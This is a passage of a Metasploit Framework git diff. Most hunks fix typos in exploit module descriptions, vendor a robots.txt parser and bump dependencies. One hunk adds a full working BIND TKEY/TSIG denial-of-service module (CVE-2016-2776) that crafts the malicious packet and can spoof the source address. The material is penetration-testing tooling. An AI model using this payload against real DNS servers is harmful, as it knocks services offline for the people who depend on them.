remote server. # def close - if (self.conn) + if self.conn && !self.conn.closed? self.conn.shutdown - self.conn.close unless self.conn.closed? + self.conn.close end self.conn = nil diff --git a/lib/robots.rb b/lib/robots.rb new file mode 100644 index 0000000000..7959c5428a --- /dev/null +++ b/lib/robots.rb @@ -0,0 +1,162 @@ +# +# Copyright (c) 2008 Kyle Maxwell, contributors +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation +# files (the "Software"), to deal in the Software without +# restriction, including without limitation the rights to use, +# copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the +# Software is furnished to do so, subject to the following +# conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. +# + +require "open-uri" +require "uri" +require "timeout" +require 'rex/logging/log_dispatcher' + +# https://github.com/fizx/robots +class Robots + DEFAULT_TIMEOUT = 3 + + # Represents a parsed robots.txt file + class ParsedRobots + def initialize(uri, user_agent) + @last_accessed = Time.at(1) + + io = Robots.get_robots_txt(uri, user_agent) + + if !io || io.content_type != "text/plain" || io.status.first != "200" + io = StringIO.new("User-agent: *\nAllow: /\n") + end + + @other = {} + @disallows = {} + @allows = {} + @delays = {} # added delays to make it work + agent = /.*/ + io.each do |line| + next if line =~ /^\s*(#.*|$)/ + arr = line.split(":") + key = arr.shift.to_s.downcase + value = arr.join(":").strip + value.strip! + case key + when "user-agent" + agent = to_regex(value) + when "allow" + @allows[agent] ||= [] + @allows[agent] << to_regex(value) + when "disallow" + @disallows[agent] ||= [] + @disallows[agent] << to_regex(value) + when "crawl-delay" + @delays[agent] = value.to_i + else + @other[key] ||= [] + @other[key] << value + end + end + + @parsed = true + end + + def allowed?(uri, user_agent) + return true unless @parsed + allowed = true + path = uri.request_uri + + @disallows.each do |key, value| + if user_agent =~ key + value.each do |rule| + allowed = false if path =~ rule + end + end + end + + @allows.each do |key, value| + unless allowed + if user_agent =~ key + value.each do |rule| + if path =~ rule + allowed = true + end + end + end + end + end + + if allowed && @delays[user_agent] + sleep @delays[user_agent] - (Time.now - @last_accessed) + @last_accessed = Time.now + end + + return allowed + end + + def other_values + @other + end + + protected + + def to_regex(pattern) + return /should-not-match-anything-123456789/ if pattern.strip.empty? + pattern = Regexp.escape(pattern) + pattern.gsub!(Regexp.escape("*"), ".*") + Regexp.compile("^#{pattern}") + end + end + + def self.get_robots_txt(uri, user_agent) + begin + Timeout.timeout(Robots.timeout) do + begin + URI.join(uri.to_s, "/robots.txt").open("User-Agent" => user_agent) + rescue StandardError + nil + end + end + rescue Timeout::Error + dlog("robots.txt request timed out") + end + end + + attr_writer :timeout + + def self.timeout + @timeout || DEFAULT_TIMEOUT + end + + def initialize(user_agent) + @user_agent = user_agent + @parsed = {} + end + + def allowed?(uri) + uri = URI.parse(uri.to_s) unless uri.is_a?(URI) + host = uri.host + @parsed[host] ||= ParsedRobots.new(uri, @user_agent) + @parsed[host].allowed?(uri, @user_agent) + end + + def other_values(uri) + uri = URI.parse(uri.to_s) unless uri.is_a?(URI) + host = uri.host + @parsed[host] ||= ParsedRobots.new(uri, @user_agent) + @parsed[host].other_values + end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 8cd1c63084..1449af4a8c 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,9 +70,9 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.1' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.9' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.0' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. @@ -171,8 +171,6 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'rex-exploitation' # Command line editing, history, and tab completion in msfconsole spec.add_runtime_dependency 'rb-readline' - # Needed by anemone crawler - spec.add_runtime_dependency 'robots' # Needed by some modules spec.add_runtime_dependency 'rubyzip' # Needed for some post modules diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 2abb00bcfa..800a2d9088 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based - on the NDR stub information information posted to openrce.org. + on the NDR stub information posted to openrce.org. Please see the action list for the different attack modes. }, diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 63149a522d..d387f35353 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -49,7 +49,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index ad2a504121..9cbfa6c1bb 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -46,7 +46,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 8d5ed21909..7d4061afe6 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset', 'Description' => %q{ - The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 + The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 385693beac..304904203f 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file download vulnerability that can be exploited by an - authenticated remote attacker to download any file in the system.. + authenticated remote attacker to download any file in the system. This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index e2a67a4547..f8f388ef84 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -61,7 +61,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 5358daea5e..5f5684c270 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary local files. This allows the user to read any files from the FS as the user Openbravo is running as (generally not root). - This module was tested againt Openbravo ERP version 3.0MP25 and 2.50MP6. + This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6. }, 'Author' => [ diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 388aa2a249..98f66d9436 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability', 'Description' => %q{ - This module tests whether a directory traversal vulnerablity is present + This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the diff --git a/modules/auxiliary/admin/http/webnms_cred_disclosure.rb b/modules/auxiliary/admin/http/webnms_cred_disclosure.rb index 2859b8a9e5..aac40a960f 100644 --- a/modules/auxiliary/admin/http/webnms_cred_disclosure.rb +++ b/modules/auxiliary/admin/http/webnms_cred_disclosure.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WebNMS Framework Server Credential Disclosure', 'Description' => %q( This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract -all user credentials. The first vulnerability is a unauthenticated file download +all user credentials. The first vulnerability is an unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user -credentials. The second vulnerability is that the the passwords in the file are +credentials. The second vulnerability is that the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux. diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 677dbddd4d..f5086898fe 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WordPress WP EasyCart Plugin Privilege Escalation', 'Description' => %q{ The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated - users of any user level to set any system option via a lack of validation in the + users of any user level to set any system option via a lack of validation in the ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 800df01a10..5102aa6f28 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Microsoft SQL Server Generic Query', 'Description' => %q{ This module will allow for simple SQL statements to be executed against a - MSSQL/MSDE instance given the appropiate credentials. + MSSQL/MSDE instance given the appropriate credentials. }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 1f7e70c901..13b5d4ee90 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given - the appropiate credentials. + the appropriate credentials. }, 'Author' => [ 'j0hn__f : ' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 63f59dd4ff..ccc52fad7f 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Oracle SQL Generic Query', 'Description' => %q{ This module allows for simple SQL statements to be executed - against a Oracle instance given the appropriate credentials + against an Oracle instance given the appropriate credentials and sid. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 78f0b5493d..ad79ecd3f1 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability', 'Description' => %q{ - This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. + This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index f9f4a8753e..6f2a440c7b 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'PostgreSQL Server Generic Query', 'Description' => %q{ This module will allow for simple SQL statements to be executed against a - PostgreSQL instance given the appropiate credentials. + PostgreSQL instance given the appropriate credentials. }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index a59d251059..9aa11c2593 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands', 'Description' => %q{ - The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which + The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which implements the protocol. This module implements the CPU STOP command, as well as the ability to crash the Ethernet card in an affected device. diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 09c487e805..00ed3382fc 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'TikiWiki Information Disclosure', 'Description' => %q{ A vulnerability has been reported in Tikiwiki, which can be exploited by - a anonymous user to dump the MySQL user & passwd just by creating a mysql + an anonymous user to dump the MySQL user & passwd just by creating a mysql error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5. diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 34da3baa0b..8f2d92e211 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The - module has been tested successfully with Webim 1.580 over Ubuntu 10.04. + module has been tested successfully with Webmin 1.580 over Ubuntu 10.04. }, 'Author' => [ 'Unknown', # From American Information Security Group diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 2ec80ec70d..c86816b9b5 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'BNAT Scanner', 'Description' => %q{ This module is a scanner which can detect Broken NAT (network address translation) - implementations, which could result in a inability to reach ports on remote + implementations, which could result in an inability to reach ports on remote machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'. }, 'Author' => diff --git a/modules/auxiliary/client/hwbridge/connect.rb b/modules/auxiliary/client/hwbridge/connect.rb index def36bda71..79ed4e7259 100644 --- a/modules/auxiliary/client/hwbridge/connect.rb +++ b/modules/auxiliary/client/hwbridge/connect.rb @@ -18,10 +18,10 @@ class MetasploitModule < Msf::Auxiliary Metasploit to interact with Hardware Devices. This extends the normal exploit capabilities to the non-ethernet realm and enables direct hardware and alternative bus manipulations. You - mush have compatible bridging hardware attached to this machine or + must have compatible bridging hardware attached to this machine or reachable on your network to use any HWBridge exploits. - Use this exploit module to connect the the physical HWBridge which + Use this exploit module to connect the physical HWBridge which will start an interactive hwbridge session. You can launch a hwbridge server locally by using compliant hardware and executing the local_hwbridge module. After that module has started, pass the HWBRIDGE_BASE_URL @@ -104,6 +104,10 @@ class MetasploitModule < Msf::Auxiliary if self.hw_specialty.has_key? 'rftransceiver' sess.load_rftransceiver if self.hw_specialty['rftransceiver'] == true end + sess.api_version = self.api_version if self.api_version + sess.fw_version = self.fw_version if self.fw_version + sess.hw_version = self.hw_version if self.hw_version + sess.device_name = self.device_name if self.device_name end # @@ -129,6 +133,18 @@ class MetasploitModule < Msf::Auxiliary if data.key? 'hw_capabilities' self.hw_capabilities = data['hw_capabilities'] end + if data.key? 'api_version' + self.api_version = data['api_version'] + end + if data.key? 'fw_version' + self.fw_version = data['fw_version'] + end + if data.key? 'hw_vesrion' + self.hw_version = data['hw_version'] + end + if data.key? 'device_name' + self.device_name = data['device_name'] + end end end end @@ -153,9 +169,17 @@ class MetasploitModule < Msf::Auxiliary attr_reader :hw_specialty attr_reader :hw_capabilities + attr_reader :api_version + attr_reader :fw_version + attr_reader :hw_version + attr_reader :device_name protected attr_writer :hw_specialty attr_writer :hw_capabilities + attr_writer :api_version + attr_writer :fw_version + attr_writer :hw_version + attr_writer :device_name end diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 608486e697..13df8e2a12 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Web Crawler', - 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.', + 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.', 'Author' => 'et', 'License' => MSF_LICENSE )) diff --git a/modules/auxiliary/dos/dns/bind_tsig.rb b/modules/auxiliary/dos/dns/bind_tsig.rb new file mode 100644 index 0000000000..b88cb02cb6 --- /dev/null +++ b/modules/auxiliary/dos/dns/bind_tsig.rb @@ -0,0 +1,99 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BIND TKEY Query Denial of Service', + 'Description' => %q{ + A defect in the rendering of messages into packets can cause named to + exit with an assertion failure in buffer.c while constructing a response + to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address + isn't allowed to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ + 'Martin Rocha', + 'Ezequiel Tavella', + 'Alejandro Parodi', + 'Infobyte Research Team' + ], + 'References' => [ + ['CVE', '2016-2776'], + ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html'] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'License' => MSF_LICENSE, + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scan_host(ip) + if datastore['SRC_ADDR'] + scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR']) + else + print_status("Sending packet to #{ip}") + scanner_send(payload, ip, rport) + end + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query << "\x00\x00" # Flags: 0x0000 Standard query + query << "\x00\x01" # Questions: 1 + query << "\x00\x00" # Answer RRs: 0 + query << "\x00\x00" # Authority RRs: 0 + query << "\x00\x01" # Additional RRs: 1 + + # Doman Name + query << get_domain # Random DNS Name + query << "\x00" # [End of name] + query << "\x00\x01" # Type: A (Host Address) (1) + query << "\x00\x01" # Class: IN (0x0001) + + # Aditional records. Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query << "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query << "\x00" + + query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query << "\x00\xff" # Class: ANY (0x00ff) + query << "\x00\x00\x00\x00" # Time to live: 0 + query << "\x00\xfc" # Data length: 252 + + # Algorithm Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query << "\x00" + + # Rest of TSIG + query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query << "\x01\x2c" # Fudge: 300 + query << "\x00\x10" # MAC Size: 16 + query << Rex::Text.rand_text_alphanumeric(16) # MAC + query << "\x8f\x65" # Original Id: 36709 + query << "\x00\x00" # Error: No error (0) + query << "\x00\x00" # Other len: 0 + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + domain+org + end +end diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index 9929e50f72..3369dc1cbc 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Dopewars Denial of Service', 'Description' => %q{ - The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to - a lack of input validation. + The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to + a lack of input validation. }, 'Author' => [ 'Doug Prostko ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2ee3e29a30..dad888e518 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'OpenSSL DTLS ChangeCipherSpec Remote DoS', 'Description' => %q{ This module performs a Denial of Service Attack against Datagram TLS in OpenSSL - version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a + version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a ChangeCipherspec Datagram before a ClientHello. }, 'Author' => [ diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index d54aea9ebb..541f1f4e0b 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary FTP request containing Telnet IAC (0xff) bytes. When constructing the response, the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes. - This issue can be triggered pre-auth and may in fact be explotiable for + This issue can be triggered pre-auth and may in fact be exploitable for remote code execution. }, 'Author' => diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index 5c0eb9a1a5..e9f9bd4c8d 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Kaillera 0.86 Server Denial of Service' , 'Description' => %q{ The Kaillera 0.86 server can be shut down by sending any malformed packet - after the intial "hello" packet. + after the initial "hello" packet. }, 'Author' => ["Sil3nt_Dre4m"], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 5cbb78f465..71c44a4f2a 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger - this bug, run this module as a service and forces a vulnerabile client + this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise. diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 8a4d8c337a..b9bf75753f 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary @versions.each do |version| print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)") @mode_6_operations.each do |op| - request = Rex::Proto::NTP.ntp_control(version, op) + request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s what = "#{request.size}-byte version #{version} mode 6 op #{op} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)") @mode_7_implementations.each do |implementation| @mode_7_request_codes.each do |request_code| - request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188) + request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary # TODO: is there a better way to pick this size? Should more than one be tried? request.payload = SecureRandom.random_bytes(16) end + request = request.to_binary_s what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message" vprint_status("#{host}:#{rport} probing with #{what}") responses = probe(host, datastore['RPORT'].to_i, request) diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index 4e8ef78ad7..3e4be7c9b5 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'SMB Negotiate SMB2 Dialect Corruption', 'Description' => %q{ - This module sends a series of SMB negiotiate requests that advertise a + This module sends a series of SMB negotiate requests that advertise a SMB2 dialect with corrupted bytes. }, 'Author' => [ 'hdm' ], diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index d5c4007219..94d8691e10 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'SMB Negotiate Dialect Corruption', 'Description' => %q{ - This module sends a series of SMB negiotiate requests with corrupted bytes + This module sends a series of SMB negotiate requests with corrupted bytes }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 51b9f935de..9bc23a0ac5 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -20,8 +20,8 @@ class MetasploitModule < Msf::Auxiliary which will cause a popup window to be used. This requires a click from the user and is much less stealthy, but is generally harmless-looking. - By supplying a CUSTOM_JS paramter and ensuring CLOSE_POPUP is set to false, this - module also allows running aribrary javascript in the context of the targeted URL. + By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this + module also allows running aribtrary 